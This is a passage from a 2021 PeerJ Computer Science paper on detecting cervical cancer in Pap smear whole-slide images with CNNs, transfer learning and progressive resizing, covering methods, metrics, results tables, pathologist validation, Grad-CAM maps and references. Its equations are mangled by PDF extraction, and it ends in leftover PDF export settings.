loss function. The learning rates were optimized using the 1-cycle policy, which helped achieve Super-Convergence with faster training, ensuring optimum regularization (Smith & Topin, 2019). We used Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 7/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Weight Decay Wd and discriminative learning rates since different layers capture different types of information. It allows us to preserve the filters in the layers closer to input learned by EfficientNet on the ImageNet dataset. The network was trained with AdamW Optimizer (Loshchilov & Hutter, 2017). The learning rates were scheduled using a 1-cycle policy, which enables Super-convergence, allowing faster training of neural networks with substantial learning rates and regularization, preventing overfitting (Yosinski et al., 2014; Smith, 2018). The learning rates were determined using the LR Finder (Howard & Gugger, 2020). Learning Rate was optimized after each epoch to identify the optimal learning rate for the subsequent epoch. Figure 6 illustrates the Learning rate finder’s employment before the first and the third training iterations of the ResNet-34 model on the Herlev dataset. Model customization and experimentation We carried out binary classification on the Herlev dataset using K-Nearest Neighbour, Stochastic Gradient Descent, Support Vector Machine, and Random Forest classifiers. We applied ResNet-34 and EfficientNet-B3 model to improve the binary classification scores. We used the Transfer Learning technique to train the VGG-19 (baseline), ResNet-34, ResNet-101, EfficientNet B3, EfficientNet B4, and EfficientNet B5 models for multi-class classification on the Herlev dataset. We used discriminative learning rates to preserve the lower level features and regulated the higher-level features for optimum results. The VGG-19 model was trained on both the datasets to carry out binary and multi-class classification as part of the first Conv Net implementation. In VGG-19, convolution layers that analyze the input image features are referred to as “backbone” and balance of the culminating linear layers—referred to as “head.” “Head” converts the analyzed features into predictions for two classes in our binary classification. To train the model with differential learning rates, we split the head from the architecture’s balance. We replaced it with an AdaptiveConcatPool layer, Flatten Layer, and blocks of Batch Normalization, Figure 6 Loss function graphs while training the ResNet-34 CNN model on Herlev Dataset. The learning rate graphs generated after the first iteration (consisting of 30 epoch) and the third iteration (consisting of 30 epochs) using LR Finder are shown at (A) and (B), respectively. Full-size DOI: 10.7717/peerj-cs.348/fig-6 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 8/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-6 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Dropout, Linear, and ReLU layers, respectively. The AdaptiveConcatPool Layer helps preserve the backbone’s feature representations more effectively than using only the MaxPool Layer or the AveragePool Layer. Also, we appended a fully-connected layer of 7 and 5 units with softmax activation as Final Classification Layer for Herlev and SIPaKMeD datasets, respectively. We carried out suitable customization of all the Conv Net for respective datasets, which attained improved performance scores. Hyperparameters—the properties that govern the entire training process and determines the network structure were carefully optimized. Learning Rate was optimized after each epoch to identify the optimal learning rate for the subsequent epoch. We determined the number of Epochs and Activations Functions, considering numerous experimental results, and used suitable optimized values while carrying out experiments. EfficientNets—image classification models scale more efficiently by deliberate balancing the network’s depth, width, and resolution. Hence, the models have demonstrated enhanced performance. We have customized the output layers suitably for binary and multi-class classification (Tan & Le, 2019) on both the datasets. We carried out experiments on EfficientNet B0, B1, B2, B3, B4, and B5. Though the EfficientNet higher variants, that is, B4-B7, have larger width, depth, or resolution, the accuracy gain was saturating/stable compared to the B3 model, which demonstrated the limitation of a single dimension scaling. Hence, experiments were carried out on EfficientNet B1, EfficientNet B2, and EfficientNet B3. We used the baseline EfficientNet-B3 model for binary and multi-class classification on our Cervical cancer datasets. For WSI Image analysis, we used the Progressive resizing technique (Howard & Gugger, 2020) on these convolutions Neural Network models. We trained the model with Imaging, sized 224 × 224, to obtain the weights. Then using these weights, we trained the model with resized the WSI images and iterated the model’s training repetitively by gradually increasing Imaging sizes to 256 × 256, 512 × 512, 1024 × 1024, followed by unfreezing saved weights (from the previous iteration) every time as each larger-scale model incorporates the previous smaller-scale model layers and weights. We observed significant results by following the Strategy. Figure 7 shows the implementation methodology of Progressive resizing on the Whole Slide Images by applying the obtained weights from one to the next training model by scaled-up image resizing. Testing During the testing, we resized the input image to (H × W) size and gave the resized images as input to the networks to predict the output class. For all the tasks on the SIPaKMeD dataset, we used 3-fold and 5-fold cross-validations with the data split released along with the dataset. RESULTS AND DISCUSSION Evaluation parameters As the accuracy in isolation does not prove the model’s efficacy, we have evaluated the model based on the performance metrics. The performance of the model is ascertained post-study of the scores, that is, Accuracy (Acc), Precision, Sensitivity (Sens), Specificity (Spec), H-Mean, F1-score, or F-Beta, and Kappa Score followed by an independent manual Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 9/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ analysis by the Pathologists. Sensitivity or recall measures the proportion of actual abnormal cells that are predicted correctly in the same class. Specificity measures the proportion of actual negatives and correctly identified as such. Accuracy is the overall percentage of correctly identifying the cells belonging to the respective classes correctly. F1 score is a classifier metric that calculates a mean of precision and recall. Accuracy ¼ TP þ TF TP þ TF þ FP þ FN Precision ¼ TP TP þ FP Figure 7 The implementation methodology for the Progressive Resizing Technique with Transfer Learning using the EfficientNet CNN model. Pre-trained weights obtained by training the model on large datasets are taken as initializing weights on the model (A) (i.e., Imaging input size of 224 × 224 pixels initially), and then carry forward the obtained weights to subsequent models (B) and (C), (i.e., Imaging input size to 256 × 256 pixels and 512 × 512 pixels respectively) to extract optimum features and enhanced efficiency progressively. Full-size DOI: 10.7717/peerj-cs.348/fig-7 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 10/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-7 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Recall ¼ TP TP þ FN F1 ¼ 2 � Precision � Recall Precision þ Recall ¼ 2 � TP 2 � TP þ FP þ FN We used Cohen’s Kappa Score (Cohen, 1960, 1968), which is a statistical measure for measuring “Intra-rater Reliability” and is a more robust measure than simple percent agreement calculation. It is a measure of agreement between observations and can be defined for two observers and where disagreement was weighted without taking into account the distance between categories. The weighted kappa statistic κw for two observers and ensures that there is no weighted kappa statistic for more than two observers. We have used the following notation is used: � N the number of cases/observations. � n the numbers of raters/observers. � k the number of categories in which a case can be rated. Cohens weighted kappa κw is derived from the normal kappa by including a weight function w. If w is chosen the identity matrix Ik, then Cohens κw is identical to Cohens κ. A linear weight is commonly chosen, which is calculated as: wij ¼ 1 � ji � jj k � 1 : (1) Alternatively, a quadratic weight could be used: wij ¼ 1 � ði � jÞ2=ðk � 1Þ2. Then: PoðwÞ ¼ 1 N Xk i¼1 Xk j¼1 wijfij; (2) PeðwÞ ¼ 1 N2 Xk i¼1 Xk j¼1 wijricj; (3) with ri and cj again the row and column sums. The weighted kappa statistic is now given by: jw ¼ PoðwÞ � PeðwÞ 1 � PeðwÞ : (4) Quantitative results Results obtained for binary classification using K-Nearest Neighbour, Stochastic Gradient Descent, Support Vector Machine, Random Forest classifier, ResNet-34, and EfficientNet-B3 models on Herlev and SiPaKMeD datasets are presented in this section. For the Herlev dataset, the ResNet-34 and EfficientNet-B3 models produced benchmark binary classification scores with 98.91% accuracy, 99.29% precision, 98.92% recall, 98.91% specificity, and 99.10%F1-Score and 99.01% accuracy, 99.15% precision, 98.89% Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 11/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ recall, 99.02% specificity, and 98.87% F-Beta score. Table 1 illustrates the quantitative comparisons of binary classification results (Herlev dataset) obtained by experimenting with K-Nearest Neighbour, Stochastic Gradient Descent, Support Vector Machine, and Random Forest classifier, ResNet-34, and EfficientNet-B3 models. Figure 8 shows the binary classification of an abnormal single-cell image using Resnet-101 (trained on Herlev dataset) and Resnet-34 (trained on SIPaKMeD dataset) CNNs. The results of the SiPaKMeD dataset are also shown in the table. Figure 9 shows the confusion matrices generated using K-Nearest Neighbour, Support Vector Machine, Stochastic Gradient Descent, Random Forest for binary classification on the Herlev dataset. Table 2 illustrates the quantitative comparison of multi-class classification results (Herlev dataset) obtained by experimenting with VGG-19, ResNet-34, ResNet-101, Figure 8 The Binary classification predictions generated using Resnet-101 (trained on Herlev dataset) and Resnet-34 (trained on SIPaKMeD dataset) for a single-cell image. The Resnet-101 and Resnet-34 CNN generated predictions with 99.92% and 98.94% for an abnormal single-cell image input (shown at (A)). The GradCam visualization and CNN feature interpretation, obtained using Resnet-101, are shown at (B) and (C), and Resnet-34 are shown at (D) and (E), respectively. Full-size DOI: 10.7717/peerj-cs.348/fig-8 Figure 9 The confusion matrices for binary classification predictions at (A) Support Vector Machines, (B) Stochastic Gradient Descent, (C) K-Nearest Neighbour, and (D) Random Forest Confusion Matrices on the Herlev dataset. Full-size DOI: 10.7717/peerj-cs.348/fig-9 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 12/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-8 http://dx.doi.org/10.7717/peerj-cs.348/fig-9 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ EfficientNet B2, EfficientNet B3, EfficientNet B4, and EfficientNet B5 models. Multi-class classification scores on SiPaKMeD dataset obtained by implementing VGG-19, ResNet-34, ResNet-101, and EfficientNet-B3 (baseline) using transfer learning viz-a-viz of EfficientNet-B3 using transfer learning, and Progressive resizing technique are also shown in the Table 2. The ResNet-101 (Baseline) and EfficientNetB3 (512 × 512) with progressive image resizing attained the highest scores. Implementations with the proposed technique Table 1 The binary classification prediction scores for Herlev and SiPaKMeD Cervical Cancer datasets under evaluation criteria, that is, Accuracy, Precision, Recall, F1-Score, and Kappa Score. The table demonstrates the scores for various binary classifiers and CNN models, that is, K-Nearest Neighbour, Support Vector Machine, Stochastic Gradient Descent, Random Forest, ResNet-34 (Base- line), and EfficientNet-B3 (Baseline). Model Accuracy (%) Precision (%) Recall (%) F1-Score (%) K-Score (%) Herlev Dataset K-Nearest Neighbour 78.142 79.268 95.588 86.666 – Support Vector Machine 76.502 76.271 99.264 86.261 – Stochastic Gradient Descent 71.584 78.378 85.294 81.690 – Random Forest 74.863 75.568 97.794 85.256 – SIPaKMeD Dataset ResNet-34 98.919 99.291 98.925 98.918 99.103 EfficientNet-B3 99.011 99.157 98.896 99.026 98.879 Table 2 The multi-class prediction scores for the Herlev and SIPaKMeD Cervical Cancer datasets under evaluation criteria, that is, Accuracy, Precision, Recall, F-Beta, and Kappa Score. Multi-class classification Convolution Neural Network used the K-fold cross-validation techniques, which showed a substantial increase in scores. The EfficientNet-B3 in consultation with Transfer Learning and Progressive resizing generated Benchmark scores for Whole-Slide images of the SIPakMeD dataset. Model K-Fold CV Accuracy (%) Precision (%) Recall (%) F-Beta (%) Kappa Score (%) Herlev VGG19 5-Fold 85.18 ± 6.90 88.22 ± 4.66 87.24 ± 7.00 87.20 ± 6.76 91.26 ± 5.40 ResNet-34 5-Fold 91.94 ± 8.73 93.36 ± 7.41 92.81 ± 8.43 92.86 ± 8.28 95.31 ± 5.05 ResNet-101 5-Fold 93.14 ± 8.78 94.56 ± 7.01 93.98 ± 8.08 94.05 ± 7.93 95.57 ± 5.55 EfficientNetB3 5-Fold 91.40 ± 10.25 92.74 ± 8.63 92.20 ± 9.36 92.19 ± 9.36 92.99 ± 8.04 EfficientNetB4 5-Fold 93.03 ± 8.95 94.31 ± 7.31 94.27 ± 7.62 94.25 ± 7.58 96.40 ± 4.51 EfficientNetB5 5-Fold 92.16 ± 9.25 93.19 ± 9.13 93.21 ± 8.23 93.12 ± 8.28 95.29 ± 4.63 SIPaKMeD VGG19 5-Fold 98.65 ± 0.57 98.79 ± 0.64 98.44 ± 0.48 98.90 ± 0.48 99.09 ± 0.41 ResNet-34 3-Fold 96.56 ± 0.13 97.19 ± 0.29 97.27 ± 0.17 97.22 ± 0.14 98.19 ± 0.13 ResNet-101 5-Fold 98.55 ± 1.11 98.57 ± 1.26 98.70 ± 0.88 98.65 ± 0.97 98.07 ± 1.47 EfficientNetB3 3-Fold 97.81 ± 0.10 98.09 ± 0.10 98.23 ± 0.23 98.24 ± 0.21 98.58 ± 0.15 EfficientNetB3 5-Fold 99.27 ± 0.74 99.36 ± 0.69 99.43 ± 0.61 99.41 ± 0.63 99.54 ± 0.60 EfficientNetB3 5-Fold 96.39 ± 1.85 96.49 ± 1.42 97.02 ± 1.59 96.88 ± 1.56 97.37 ± 1.12 EfficientNetB3 5-Fold 99.70 ± 1.07 99.70 ± 1.03 99.72 ± 0.87 99.63 ± 0.88 99.31 ± 0.78 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 13/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ have attained perfect scores in Sensitivity, Specificity, and the best Kappa Scores. F1-scores of these models indicate the robustness in multi-class classification. EfficientNet B3 models have been evaluated against all possibilities of overfitting. The multi-class classification results demonstrated improved feature extraction and computation efficiency with progressive resizing. Figure 10 shows the confusion matrices of the multi-class classification generated using EfficientNet-B3 CNN on the SIPaKMeD dataset. We did experiments on EfficientNet B3 with pre-trained weights and training them on 224 × 224, 256 × 256, 512 × 512, and 1024 × 1024 progressively. The 5-fold cross-validation indicates that the model did not overfit. Results validation We used the annotated Herlev and SIPaKMeD datasets. However, the data were analyzed and reviewed by an expert pathologist in a secondary care hospital. An extensive set of Whole Slide Images were shown to the experts for manual analysis and inspection to acquaint the dataset. We carried out validation tests to ascertain the results generated by the system. The validation was carried out by manual Kappa Score tally. 35 × Whole Slide Images were segregated for the validation test, which was not part of training/testing datasets. Independent pathologists and the trained model were given 35 × WSI images one by one for analysis. The system prediction scores were tallied with expert analysis. Out of 35 × WSI images, 34 × WSI results matched. The expert could not interpret one WSI image due to low image quality. Observer bias was ruled out for each diagnosis, under the same microscopic setup and view by taking in the review of two more pathologists to authenticate diagnosis by the system. Figure 10 The confusion matrices at (A) and generalized score at (B) for multi-class classification results (for SiPaKMeD dataset) obtained with the EfficientNet-B3 model. The benchmark classifi- cation score highlights the optimum results achieved by employing Transfer Learning in consultation with Progressive Resizing. Full-size DOI: 10.7717/peerj-cs.348/fig-10 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 14/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-10 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Saliency maps We generated Grad-CAM heat-maps using the final Layer of a Convolution Neural Network. To assimilate the results generated by the system and enhanced manual validation, Saliency Maps, that is, Gradient-weighted Class Activation Map (GradCAM) was implemented (Selvaraju et al., 2017). In Adaptive Average Pooling, we took the average of all the 1 × 1 × 512 channels. We converted them to a tensor of 512, followed by multiplying the tensor with size (512 × no. of classes) to get the final output. While validating multi-class experiments for whole slide Pap smear images, we took five classes. The 512 values represented the features extracted by the convolutions layers, which are matrices. We took the first cell’s average across every channel to show activated areas when the model predicted a specific class. To generate the heatmaps, we used “hooks.” Figure 11 shows the Grad-CAM for various class inputs by highlighting the feature extraction and predictions for abnormal and benign WSI classes. CONCLUSIONS In this research, we proposed a binary and multi-class classification pipeline for identifying carcinoma in Pap smear images to carry out metamorphic diagnosis of neoplastic and pre-neoplastic lesions. We are inspired by the emerging role of CNNs to aid medical imaging-based diagnostics, which can play as a digital second opinion to improve palliative care. The proposed pipeline starts with a cervical cell recognition stage. To begin with, we carried out experiments with binary classifiers and obtained performance scores. Towards the further enhancements, we improved ResNet-34, ResNet-101, and EfficientNet B3 models’ performance with Transfer Learning. The ResNet-34 and EfficientNet B3 trained with the Transfer Learning technique showed a significant increase Figure 11 The model generated Gradient-weighted Class Activation Maps for the input Pap smear images, respectively. Input Pap smear and generated Gradient-weighted Class Activation Maps show results for (A) Abnormal ‘Koilocytotic,’ (B) Benign ‘Metaplastic,’ and (C) Abnormal ‘Dyskeratotic’ classes. Full-size DOI: 10.7717/peerj-cs.348/fig-11 Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 15/18 http://dx.doi.org/10.7717/peerj-cs.348/fig-11 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ in performance, achieving 98.91% accuracy, 99.29% precision, 98.92% recall, 98.91% specificity, 99.10% F1-Score, and 99.01% accuracy, 99.15% precision, 98.89% recall, 99.02% specificity, the 98.87% F-Beta score for SIPaKMeD Dataset, respectively. In a later stage, we carried out multi-class classification experiments on both datasets. We addressed a problem that has not been addressed effectively by any literature, that is, Whole Slide Image analysis with multi-class classification. We proposed a novel approach of implementing Progressive Resizing and Transfer Learning on Deep Neural Network models, which attained State-of-the-Art computational efficiency and best of the scores for accurate classifications. Convolution Neural Network model- EfficientNet-B3 trained using Transfer Learning, and Progressive Resizing showed promising multi-class classification results. We achieved benchmark scores on WSI by effectively analyzing multi-layer cervical cells with, that is, 99.70% Accuracy, 99.70% Precision, 99.72% Recall, 99.63% Specificity, and 99.31% F-Beta score. We outperformed other techniques cited in recent literature, consistently in both types of classification problems. We ascertained the system generated predictions by a validation test where an expert’s manual analysis was tallied with prediction. We also showed the model’s transparency by visualizing the features learned by saliency maps, which enabled us to visualize the CNN generated predictions. ACKNOWLEDGEMENTS We want to dedicate the work for humanity and the people working unflinchingly towards exploring remedies to cure cervical cancer infections. We also thank Dr. Ragini Thapa, a Graded Pathologist, for valuable medical inputs and extending help in manual validation of the Pap smear image samples. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Anant R. Bhatt conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Amit Ganatra conceived and designed the experiments, prepared figures and/or tables, and approved the final draft. � Ketan Kotecha analyzed the data, authored or reviewed drafts of the paper, validation of Results, and approved the final draft. Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 16/18 http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Data Availability The following information was supplied regarding data availability: Source code is available in the Supplemental Files. Data are available at the Herlev Cervical Cancer Database (http://mde-lab.aegean.gr/ index.php/downloads; specifically Part II: "New Pap-smear Database (images)") and the SIPaKMeD Cervical Cancer Database (https://www.cs.uoi.gr/~marina/sipakmed.html; data from all cell categories were used). Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.348#supplemental-information. REFERENCES Cohen J. 1960. A coefficient of agreement for nominal scales. Educational and Psychological Measurement 20(1):37–46 DOI 10.1177/001316446002000104. Cohen J. 1968. Weighted kappa: nominal scale agreement with provision for scaled disagreement or partial credit. Psychological Bulletin 70(4):213–220 DOI 10.1037/h0026256. Cortes C, Vapnik V. 1995. Support vector machine. Machine Learning 20(3):273–297. Howard J, Gugger S. 2020. Fastai: a layered api for deep learning. Information: An International Interdisciplinary Journal 11(2):108. Isa NM. 2005. Automated edge detection technique for Pap smear images using moving k-means clustering and modified seed based region growing algorithm. International Journal of the Computer, the Internet and Management 13(3):45–59. Loshchilov I, Hutter F. 2017. Fixing weight decay regularization in adam. Available at https://arxiv.org/abs/1711.05101. Pan SJ, Yang Q. 2009. A survey on transfer learning. IEEE Transactions on Knowledge and Data Engineering 22(10):1345–1359 DOI 10.1109/TKDE.2009.191. Papanicolaou GN, Traut HF. 1941. The diagnostic value of vaginal smears in carcinoma of the uterus. American Journal of Obstetrics and Gynecology 42(2):193–206 DOI 10.1016/S0002-9378(16)40621-6. Plissiti ME, Dimitrakopoulos P, Sfikas G, Nikou C, Krikoni O, Charchanti A. 2018. Sipakmed: a new dataset for feature and image based classification of normal and pathological cervical cells in Pap smear images. In: 2018 25th IEEE International Conference on Image Processing (ICIP). Piscataway: IEEE, 3144–3148. Plissiti ME, Nikou C, Charchanti A. 2010. Automated detection of cell nuclei in Pap smear images using morphological reconstruction and clustering. IEEE Transactions on Information Technology in Biomedicine 15(2):233–241 DOI 10.1109/TITB.2010.2087030. Saslow D, Solomon D, Lawson HW, Killackey M, Kulasingam SL, Cain J, Garcia FAR, Moriarty AT, Waxman AG, Wilbur DC, Wentzensen N, Downs LS Jr, Spitzer M, Moscicki A-B, Franco EL, Stoler MH, Schiffman M, Castle PE, Myers ER. 2012. American cancer society, american society for colposcopy and cervical pathology, and american society for clinical pathology screening guidelines for the prevention and early detection of cervical cancer. American Journal of Clinical Pathology 137(4):516–542 DOI 10.1309/AJCPTGD94EVRSJCG. Selvaraju RR, Cogswell M, Das A, Vedantam R, Parikh D, Batra D. 2017. Grad-cam: visual explanations from deep networks via gradient-based localization. In: Proceedings of the IEEE International Conference on Computer Vision. 618–626. Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 17/18 http://dx.doi.org/10.7717/peerj-cs.348#supplemental-information http://mde-lab.aegean.gr/index.php/downloads http://mde-lab.aegean.gr/index.php/downloads https://www.cs.uoi.gr/~marina/sipakmed.html http://dx.doi.org/10.7717/peerj-cs.348#supplemental-information http://dx.doi.org/10.7717/peerj-cs.348#supplemental-information http://dx.doi.org/10.1177/001316446002000104 http://dx.doi.org/10.1037/h0026256 https://arxiv.org/abs/1711.05101 http://dx.doi.org/10.1109/TKDE.2009.191 http://dx.doi.org/10.1016/S0002-9378(16)40621-6 http://dx.doi.org/10.1109/TITB.2010.2087030 http://dx.doi.org/10.1309/AJCPTGD94EVRSJCG http://dx.doi.org/10.7717/peerj-cs.348 https://peerj.com/computer-science/ Simonyan K, Vedaldi A, Zisserman A. 2013. Deep inside convolutional networks: visualising image classification models and saliency maps. Available at https://arxiv.org/abs/1312.6034. Simonyan K, Zisserman A. 2014. Very deep convolutional networks for large-scale image recognition. Available at https://arxiv.org/abs/1409.1556. Smith LN. 2018. A disciplined approach to neural network hyper-parameters: part 1-learning rate, batch size, momentum, and weight decay. Available at https://arxiv.org/abs/1803.09820. Smith LN, Topin N. 2019. Super-convergence: very fast training of neural networks using large learning rates. In: Artificial Intelligence and Machine Learning for Multi-Domain Operations Applications, Volume 11006. International Society for Optics and Photonics, 1100612. Solomon D, Davey D, Kurman R, Moriarty A, O’Connor D, Prey M, Raab S, Sherman M, Wilbur D, Wright T Jr, Young N. 2002. The 2001 bethesda system: terminology for reporting results of cervical cytology. JAMA 287(16):2114–2119. Szegedy C, Ioffe S, Vanhoucke V, Alemi A. 2016. Inception-v4, inception-resnet and the impact of residual connections on learning. Available at https://arxiv.org/abs/1602.07261. Tan M, Le QV. 2019. Efficientnet: rethinking model scaling for convolutional neural networks. Available at https://arxiv.org/abs/1905.11946. World Health Organization. 2018a. Comprehensive cervical cancer control: a guide to essential practice 2006. Geneva: World Health Organization. World Health Organization. 2018b. Latest global cancer data: cancer burden rises to 18.1 million new cases and 9.6 million cancer deaths in 2018. Geneva: World Health Organization. Yosinski J, Clune J, Bengio Y, Lipson H. 2014. How transferable are features in deep neural networks? In: Advances in Neural Information Processing Systems, 3320–3328. Zhang L, Lu L, Nogues I, Summers RM, Liu S, Yao J. 2017. Deeppap: deep convolutional networks for cervical cell classification. IEEE Journal of Biomedical and Health Informatics 21(6):1633–1643 DOI 10.1109/JBHI.2017.2705583. Zhang Q, Nian Wu Y, Zhu S-C. 2018. Interpretable convolutional neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition. 8827–8836. Bhatt et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.348 18/18 https://arxiv.org/abs/1312.6034 https://arxiv.org/abs/1409.1556 https://arxiv.org/abs/1803.09820 https://arxiv.org/abs/1602.07261 https://arxiv.org/abs/1905.11946 http://dx.doi.org/10.1109/JBHI.2017.2705583 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.348 Cervical cancer detection in pap smear whole slide images using convNet with transfer learning and progressive resizing Introduction Datasets Proposed methodology Results and discussion Conclusions flink6 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP 